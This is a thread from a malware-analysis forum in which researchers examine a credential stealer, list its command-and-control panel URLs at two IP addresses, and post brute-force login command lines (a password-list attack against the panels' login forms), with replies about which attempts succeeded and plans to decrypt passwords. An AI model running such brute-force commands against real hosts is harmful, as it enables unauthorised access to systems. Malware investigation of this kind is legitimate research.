A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17889  by rinn
 Sun Jan 27, 2013 12:44 pm
unixfreaxjp wrote:I'll have it remember for the next time, how about the other registry blob who shot the desktop info,
was it coming from process monitor too? I must dig more about this tool..In the mean time I revoke analysis related to the related point mentioned.

rgds
Hi.

It is from Explorer. This is desktop icon arrangement settings. I see you have ProcMon, Process Explorer, RegShot, OllyDbg, Wireshark, CaptureBat, HiJackThis.

http://answers.microsoft.com/en-us/wind ... 72a07e2c11

Best Regards,
-rin
 #17894  by unixfreaxjp
 Sun Jan 27, 2013 3:13 pm
rinn wrote:Hi.

It is from Explorer. This is desktop icon arrangement settings. I see you have ProcMon, Process Explorer, RegShot, OllyDbg, Wireshark, CaptureBat, HiJackThis.

http://answers.microsoft.com/en-us/wind ... 72a07e2c11
Best Regards,
-rin
Awesome! Bless you for pointing me the correct path. I guess I'm a full-time learner for sure.
Just check it here and there, to find that the usual registry changes (autorun, configs + some little here & there) was the stealer actually did. No changes in registry. I revoke all of my statement accordingly.
 #17895  by Xylitol
 Sun Jan 27, 2013 3:37 pm
panel locs, web stuff
Code: Select all
85.143.166.141/mx/1A/panel/
62.76.177.123/mx/5/E/panel/
62.76.177.123/mx/5/B/panel/
62.76.177.123/mx/5/A/panel/
62.76.177.123/mx/6/E/panel/
62.76.177.123/mx/6/B/panel/
62.76.177.123/mx/6/A/panel/
62.76.177.123/mx/3A/panel/
85.143.166.141/mx/3A/panel/
62.76.177.123/if_Career/admin.php
85.143.166.141/mx/3A/panel/tpl/theme1/res/
85.143.166.141/mx/3A/panel/events.php
85.143.166.141/mx/3A/panel/header.php
85.143.166.141/mx/3A/panel/users.php
85.143.166.141/mx/3A/panel/reports.php
85.143.166.141/mx/3A/panel/report.php
85.143.166.141/mx/3A/panel/cp.php
85.143.166.141/mx/3A/panel/footer.php
85.143.166.141/mx/3A/panel/config.php
85.143.166.141/mx/3A/panel/settings.php
85.143.166.141/mx/3A/panel/socks.php
85.143.166.141/mx/3A/panel/commands.php
---
85.143.166.141/info.php
85.143.166.141/check.php
85.143.166.141/mx/3A/in/include/
85.143.166.141/mx/3A/in/cp.php
85.143.166.141/mx/3A/in/config.php
85.143.166.141/mx/3A/in/cp8.php
 #17899  by unixfreaxjp
 Sun Jan 27, 2013 5:43 pm
use:
Code: Select all
-l admin -P pwd.lst -s 80 -w 64 -f -V 85.143.166.141 http-post-form "/mx/3A/panel/events.php:login&username=admin&password=^PASS^:Bad user name or password."
works.
 #17901  by unixfreaxjp
 Sun Jan 27, 2013 6:39 pm
the other one:
Code: Select all
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.76.177.123 http-post-form "/if_Career/admin.php:&pass=^PASS^:Bad user name or password." 
 #17902  by unixfreaxjp
 Sun Jan 27, 2013 6:46 pm
Xylitol wrote:nah, will not work
Thank you for replying and advice, but pls look at this:
Image
attached pwd.lst I used.
Attachments
internal members only pls..
(4.16 KiB) Downloaded 79 times
 #17903  by unixfreaxjp
 Sun Jan 27, 2013 6:58 pm
Xylitol wrote:should be ok.
I revoked my commands for the 85.143.166.141, yes Xylit0l ones worked better!
snipped:
Image
One more thing, bad news: all of the pwd.lst rejected..
As per suspect they encrypt the pwds now.. (banging head to the wall)
love to get the screenshot for evidence, any helps?
 #17904  by unixfreaxjp
 Sun Jan 27, 2013 7:09 pm
Tried all previous cases' password. all of them are failed. latest one is attached.
Guess we must start decrypt it properly.. ok, good, start now..
Attachments
internal material only.
(1.23 KiB) Downloaded 78 times
  • 1
  • 4
  • 5
  • 6
  • 7
  • 8
  • 15